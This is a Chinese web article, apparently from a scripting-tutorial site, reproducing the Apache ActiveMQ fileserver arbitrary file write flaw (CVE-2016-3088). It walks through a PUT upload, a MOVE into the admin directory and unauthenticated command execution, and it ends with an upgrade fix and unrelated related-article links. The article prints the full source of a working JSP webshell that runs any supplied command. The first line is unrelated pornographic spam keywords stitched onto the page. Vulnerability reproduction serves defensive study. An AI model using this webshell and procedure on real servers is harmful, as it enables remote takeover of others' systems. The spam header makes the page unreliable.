欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復(fù)現(xiàn)

 更新時(shí)間:2019年08月07日 14:06:44   作者:雨中落葉  
這篇文章主要介紹了Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復(fù)現(xiàn),需要的朋友可以參考下

一、漏洞描述

該漏洞出現(xiàn)在fileserver應(yīng)用中,漏洞原理:ActiveMQ中的fileserver服務(wù)允許用戶通過HTTP PUT方法上傳文件到指定目錄。Fileserver支持寫入文件(不解析jsp),但是支持移動(dòng)文件(Move)我們可以將jsp的文件PUT到Fileserver下,然后再通過Move指令移動(dòng)到可執(zhí)行目錄下訪問。

二、漏洞影響版本

Apache ActiveMQ 5.0.0 - 5.13.2

三、漏洞環(huán)境搭建

1、官網(wǎng)下載apache-activemq-5.7.0-bin.tar 下載地址:http://activemq.apache.org/download-archives.html

2、解壓

3、啟動(dòng),進(jìn)入bin目錄下,運(yùn)行./activemq start

  

4、瀏覽器訪問http://192.168.10.149:8161/,如下圖可以看到成功搭建環(huán)境

  

四、漏洞復(fù)現(xiàn)

1、PUT上傳一個(gè)jsp的webshell到fileserver目錄,下圖可以看到成功上傳jsp文件

Jsp文件內(nèi)容:

<%@ page import="java.io.*"%>
<%
 out.print("Hello</br>");
 String strcmd=request.getParameter("cmd");
 String line=null;
 Process p=Runtime.getRuntime().exec(strcmd);
 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
 while((line=br.readLine())!=null){
 out.print(line+"</br>");
 }
%>

  

2、瀏覽器訪問http://192.168.10.149:8161/fileserver/1.jsp,下圖可以看到fileserver目錄下的webshell沒有被解析,說明fileserver目錄沒有執(zhí)行權(quán)限

  

3、利用該版本存在物理路徑泄露漏洞,爆一下絕對路徑

  

4、利用Move方法將webshell移入admin目錄下,如下圖所示成功把文件移入到admin目錄

  

5、利用該版本存在的未授權(quán)訪問漏洞,不用登錄,訪問http://192.168.10.149:8161/admin/1.jsp?cmd=ls,下圖可以看到成功執(zhí)行命令

  

五、漏洞防御

1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建議用戶升級(jí)至 5.14.0 及其以后版本。

---------------------------------------------------------------------------------

參考: https://www.secpulse.com/archives/60064.html

總結(jié)

以上所述是小編給大家介紹的Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復(fù)現(xiàn),希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會(huì)及時(shí)回復(fù)大家的。在此也非常感謝大家對腳本之家網(wǎng)站的支持!
如果你覺得本文對你有幫助,歡迎轉(zhuǎn)載,煩請注明出處,謝謝!

相關(guān)文章

  • Ubuntu上使用Netdata設(shè)置實(shí)時(shí)性能監(jiān)控的詳細(xì)流程

    Ubuntu上使用Netdata設(shè)置實(shí)時(shí)性能監(jiān)控的詳細(xì)流程

    Netdata通過可擴(kuò)展的Web儀表板提供準(zhǔn)確的性能監(jiān)控,可以顯示Linux系統(tǒng)上的流程和服務(wù)。這篇文章給大家介紹Ubuntu上使用Netdata設(shè)置實(shí)時(shí)性能監(jiān)控的流程,感興趣的朋友一起看看吧
    2018-08-08
  • Linux使用crontab定時(shí)執(zhí)行腳本任務(wù)的流程詳解

    Linux使用crontab定時(shí)執(zhí)行腳本任務(wù)的流程詳解

    在Linux中可以使用crontab來定時(shí)執(zhí)行腳本,crontab是一個(gè)用于管理定時(shí)任務(wù)的工具,可以讓在特定的時(shí)間間隔內(nèi)自動(dòng)運(yùn)行腳本或命令,本文我們將使用cron來定期執(zhí)行一個(gè)寫入命令或腳本,需要的朋友可以參考下
    2023-10-10
  • 安裝Ubuntu 20.04后要做的事(小白教程)

    安裝Ubuntu 20.04后要做的事(小白教程)

    這篇文章主要介紹了安裝Ubuntu 20.04后要做的事(小白教程),文中通過示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧
    2020-05-05
  • apache配置開啟網(wǎng)站服務(wù)步驟

    apache配置開啟網(wǎng)站服務(wù)步驟

    apache配置開啟網(wǎng)站服務(wù)步驟,需要的朋友可以參考下。
    2010-06-06
  • Linux上通過SSH掛載遠(yuǎn)程文件系統(tǒng)方法詳解

    Linux上通過SSH掛載遠(yuǎn)程文件系統(tǒng)方法詳解

    在本篇內(nèi)容里小編給大家整理了關(guān)于在Linux上通過SSH掛載遠(yuǎn)程文件系統(tǒng)的相關(guān)知識(shí)點(diǎn),需要的朋友們跟著學(xué)習(xí)下。
    2019-03-03
  • bash腳本中將密碼傳遞給ssh/scp命令方法詳解

    bash腳本中將密碼傳遞給ssh/scp命令方法詳解

    在本篇內(nèi)容里小編給大家整理了關(guān)于bash腳本中將密碼傳遞給ssh/scp命令的相關(guān)方法和知識(shí)點(diǎn),需要的朋友們學(xué)習(xí)下。
    2019-03-03
  • 淺談Linux環(huán)境下gcc優(yōu)化級(jí)別

    淺談Linux環(huán)境下gcc優(yōu)化級(jí)別

    這篇文章主要介紹了Linux環(huán)境下gcc優(yōu)化級(jí)別,涉及gcc系列的相關(guān)內(nèi)容,具有一定參考價(jià)值,需要的朋友可以了解下。
    2017-09-09
  • LNMP系列教程之 設(shè)置404錯(cuò)誤頁面

    LNMP系列教程之 設(shè)置404錯(cuò)誤頁面

    在之前的文章中分享到”設(shè)置301重定向的方法“文章,提到301,那肯定也要說說404錯(cuò)誤頁面吧。因?yàn)槲覀兡J(rèn)安裝了LNMP后404頁面不會(huì)自動(dòng)設(shè)置,也不會(huì)默認(rèn)到程序的404錯(cuò)誤頁面,而需要我們手工設(shè)置
    2012-09-09
  • Centos 6.8編譯安裝LNMP環(huán)境(Nginx+MySQL+PHP)教程

    Centos 6.8編譯安裝LNMP環(huán)境(Nginx+MySQL+PHP)教程

    這篇文章主要介紹了關(guān)于CentOS 6.8中編譯安裝LNMP環(huán)境的相關(guān)資料,LNMP即Linux,Nginx,MySQL,PHP,文中通過一步步的步驟介紹的非常詳細(xì),需要的朋友可以參考借鑒,下面來一起看看吧。
    2017-03-03
  • CentOS7使用yum安裝PostgreSQL和PostGIS的方法

    CentOS7使用yum安裝PostgreSQL和PostGIS的方法

    這篇文章主要介紹了CentOS7使用yum安裝PostgreSQL和PostGIS的方法,非常不錯(cuò),具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2019-09-09

最新評論